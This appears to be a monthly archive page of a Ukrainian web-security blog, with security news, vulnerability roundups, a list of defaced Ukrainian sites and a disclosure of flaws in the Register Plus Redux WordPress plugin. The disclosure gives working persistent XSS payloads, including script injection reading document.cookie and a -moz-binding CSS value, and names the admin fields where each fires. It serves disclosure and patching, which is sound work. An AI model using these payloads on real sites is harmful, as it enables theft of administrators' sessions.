Архів за Грудень, 2011

З Новим Роком!

23:39 31.12.2011

Вже наближається 2012 рік і я поздоровляю вас з Новим Роком!

Бажаю всього найкращого вам в новому році, бажаю безпеки вам, вашим сайтам і веб додаткам ;-) .

Слідкуйте за безпекою власних сайтів і тоді з ними нічого поганого не трапиться. І вони будуть надійно працювати та приносити радість вам і вашим відвідувачам.

І для гарного святкового настрою можете послухати композицію Sense Of Beat (Energy Mix) з мого нового сінгла.

Уразливості в плагінах для WordPress №56

22:45 31.12.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Skysa App Bar, 1 jquery photo gallery slideshow flash та Flash album gallery. Для котрих з’явилися експлоіти. Skysa App Bar - це плагін для розширення сайту за рахунок розміщення веб додатків на панелі, 1 jquery photo gallery slideshow flash - це плагін для створення фотогалереї, Flash album gallery - це також плагін для створення фотогалереї.

  • Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities (деталі)
  • Wordpress 1-jquery-photo-gallery-slideshow-flash plugin Cross-Site Scripting Vulnerabilities (деталі)
  • Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Новини: CryptDB, уразливість у WPS та в GSM-зв’язку

20:19 31.12.2011

За повідомленням www.opennet.ru, CryptDB - проект по забезпеченню надійного шифрування даних у СУБД.

Дослідники з Массачусецького технологічного інституту представили проект CryptDB, у рамках якого почата спроба вирішення проблеми безпечного збереження даних у БД, що обслуговуються в хмарних сервісах та інших непідконтрольних системах. Основна проблема при збереженні важливої інформації в непідконтрольних СУБД пов’язана з можливістю витоку даних у процесі взлому сервісу чи в результаті неправомірних дій адміністраторів.

Для вирішення цієї проблеми в CryptDB забезпечена підтримка шифрування, при якій дані на стороні СУБД ніколи не фігурують у відкритому вигляді, а всі передані в CУБД запити містять тільки зашифровані дані, у тому числі в умовних блоках.

За повідомленням www.xakep.ru, нова уразливість у WPS дозволяє швидше вгадувати PIN-код маршрутизатора.

Недавно виявлена уразливість у стандарті Wi-Fi Protected Setup (WPS) скорочує кількість спроб, що потрібні хакеру, що намагається брутфорсити PIN-код процесу установки бездротового роутера. У результаті помилки занадто багато інформації про PIN-код повертається нападнику, а сам PIN-код стає слабшим, що негативно впливає на захист мільйонів Wi-Fi маршрутизаторів і точок доступу. Дослідник безпеки Стефан Вибок знайшов цю уразливість і повідомив про неї в US-CERT.

Наприклад, точка доступа D-Link DAP 1150, яку я використовую, має WPS відключеним по замовчуванню. Така конфігурація дозволяє апріорі убезпечити пристрій від атак на WPS, тому виробникам мережевих пристроїв слід використовувати даний підхід.

За повідомленням www.xakep.ru, експерти попереджають про потенційну уразливість GSM-зв’язку.

Карстен Нол, керівник німецької компанії Security Research Labs, стверджує, що особливості роботи GSM-мереж теоретично дозволяють захопити контроль практично над будь-яким стільниковим апаратом.

XSS та IAA уразливості в Register Plus Redux для WordPress

17:21 31.12.2011

01.12.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це друга з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2011

Persistent XSS:

На сторінці http://site/wp-admin/options-general.php ?page=register-plus-redux є наступні уразливості.

В полях: Email Verification, Admin Verification, User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification), Custom Register CSS, Custom Login CSS:
</textarea><script>alert(document.cookie)</script>
Код спрацює на сторінці http://site/wp-admin/options-general.php?page=register-plus-redux, а у випадку полей Email Verification і Admin Verification ще спрацює на сторінці http://site/wp-login.php?checkemail=registered.

Якщо вказати код в полях Custom Register CSS, Custom Login CSS:

body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

То код відповідно спрацює на сторінках http://site/wp-login.php?action=register та http://site/wp-login.php. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Якщо вказати код в полі Minimum password length (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1
То код спрацює на сторінці http://site1/wp-login.php?action=register.

Якщо вказати код в полях Empty, Short, Bad, Good, Strong, Mismatch (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
"};alert(document.cookie);/*
То код спрацює на сторінці http://site/wp-login.php?action=register.

Якщо вказати код в полі Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
То код спрацює на сторінці http://site/wp-login.php?action=register. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Strictly Social XSS persistent:

У вищезгаданих полях User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification) окрім XSS в самому полі, є ще XSS через візуалізацію (що відбувається через jQuery), і відповідно при відправці POST запиту код спрацює двічі, й виправляти кожну з цих уразливостей потрібно в двох місцях (бо навіть заескейпчений html-код виконається). Також, окрім атаки через відправку POST запиту, можна провести XSS атаку через візуалізацію в цих трьох полях, а також в девяти інших полях (From Email, From Name, Subject в Custom New User Message, в Custom Verification Message та в Custom Admin Notification) при вставці XSS коду в поле.

Тобто потрібно обманним чином змусити жертву вставити код в одне з цих дванадцяти полів, при цьому код можна занести жертві в буфер через атаку через буфер обміну. Дані уразливості - це Strictly social XSS.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі). Як і в попередніх версіях плагіну.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

Уразливості в Belkin Surf N150 Wireless N Router

23:59 30.12.2011

Продовжу тему Wi-Fi точок доступа після D-Link DAP 1150. Сьогодні я дослідив пристрій Belkin Surf N150 Wireless N Router, що являє собою Wi-Fi Access Point та Router. І попередній аналіз цього пристовую показав, що в ньому мають місце Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Такі ж уразливості, що і в D-Link DAP 1150, та в ADSL роутерах D-Link DSL-500T та Iskra Callisto 821+.

Цей пристрій лежав в мене ще з початку грудня, лише сьогодні до нього дістався. Але при дослідженні виявилося, що пристрій глючний (немає доступу до адмінки, ні по даним вказаним в документації, ні по даним доступним в Інтернеті). Тому майже нічого перевірити не вдалося і поки що лише опосередковано (по документації пристрою) можу судити по наявності в нього даних уразливостей. Які є типовими для всіх мережевих пристроїв.

Коли вдаться вирішити проблеми з глюками цього пристрою, я оприлюдню більш детальну інформацію про його уразливості - в цьому записі та нових записах про уразливості в Belkin Surf N150. При цьому зазначу, що Windows-додаток для налаштувань пристрою, який постачається на CD, використовує спеціальний захисний підхід до проведення конфігурації девайся, що убезпечує його від локальних атак.

Подібне я зустрів вперше і на мережевих пристроях інших виробників такого я не зустрічав. Тому пристрій Belkin виглядає більш безпечним порівняно з іншими точками доступа (але я планую ще перевірити чи використовується цей підхід в панелі керування).

Вийшов WordPress 3.3

22:46 30.12.2011

В грудні, 12.12.2011, вишла нова версія WordPress 3.3.

WordPress 3.3 це перший випуск нової 3.3 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, в тому числі виправлено чимало багів.

Серед головних покращень зокрема можна відзначити підказки для нових користувачів системи, покращені навігацію, завантаження та імпорт. Новий аплоадер підтримує drag-and-drop можливість завантаження файлів. Для навігації з’явилися вспливаючі меню та новий тулбар. Покращена функція сумісного редагування та доданий імпорт з Tumblr.

А також покращена робота з дошкою оголошень (dashboard) на iPad та інших планшетах. Окрім покращень для користувачів також були зроблені численні покращення для розробників.

Похакані сайти №175

20:19 30.12.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://csam.archives.gov.ua (хакером nO lOv3) - 09.10.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://bereg-rda.gov.ua (хакером Dr-Angel) - 12.10.2011 - взломаний державний сайт, txt-файл нападника все ще розміщений в кореневій папці сайта
  • http://www.fpvk.org (хакером biangrusuh) - 14.02.2011, зараз сайт не працює
  • http://alpha-ug.com.ua (хакером Dr-Angel) - 12.10.2011, зараз сайт вже виправлений адмінами
  • http://aishadance.com (хакером Dr-Angel) - 12.10.2011, зараз сайт вже виправлений адмінами

Добірка уразливостей

17:23 30.12.2011

В даній добірці уразливості в веб додатках:

  • Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default (деталі)
  • SQL injection in Social Slider (деталі)
  • XWeavers (page.asp?id) Remote SQL injection Vulnerability (деталі)
  • Software Center vulnerability (деталі)
  • Synchrony Infotech (product_details.php?id) Remote SQL injection Vulnerability (деталі)
  • Kimia Remote SQL injection Vulnerability (деталі)
  • Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability (деталі)
  • Remot File Include In Aardvark Topsites PHP 5 (деталі)
  • Remot File Include In Shop-SCRIPT FREE (деталі)
  • Remot File Include In SLAED CMS 2 (деталі)

Численні уразливості в Microsoft Internet Explorer

22:45 29.12.2011

15.12.2011

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8 та 9 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7.

Витік інформації, небезпечне завантаження бібліотек.

  • Microsoft Security Bulletin MS11-099 - Important Cumulative Security Update for Internet Explorer (2618444) (деталі)

29.12.2011

Додаткова інформація.

  • Microsoft Windows Media Player DVR-MS Buffer Overflow Vulnerability (MS11-092) (деталі)

Безпека e-commerce сайтів в Уанеті №12

20:16 29.12.2011

Продовжу своє дослідження безпеки e-commerce сайтів в Уанеті.

Веб сайти, що займаються електронною комерцією (e-commerce), повинні дбати про свою безпеку. Бо вони заробляють гроші на своїй онлайн діяльності і будь-які проблеми з безпекою на їх сайтах можуть їм коштувати фінансових втрат.

Але нажаль e-commerce сайти в Уанеті достатньо діряві, бо власники цих сайтів за безпекою особливо не слідкують.

В себе в новинах я писав про уразливості на наступних сайтах банків, онлайн магазинів та електронних платіжних систем України:

Також згадував про взломані онлайн магазини та e-commerce сайти в Уанеті:

А також згадував про інфіковані онлайн магазини в Уанеті:

Так що українським e-commerce сайтам (та сайтам інших країн) є куди покращувати свою безпеку.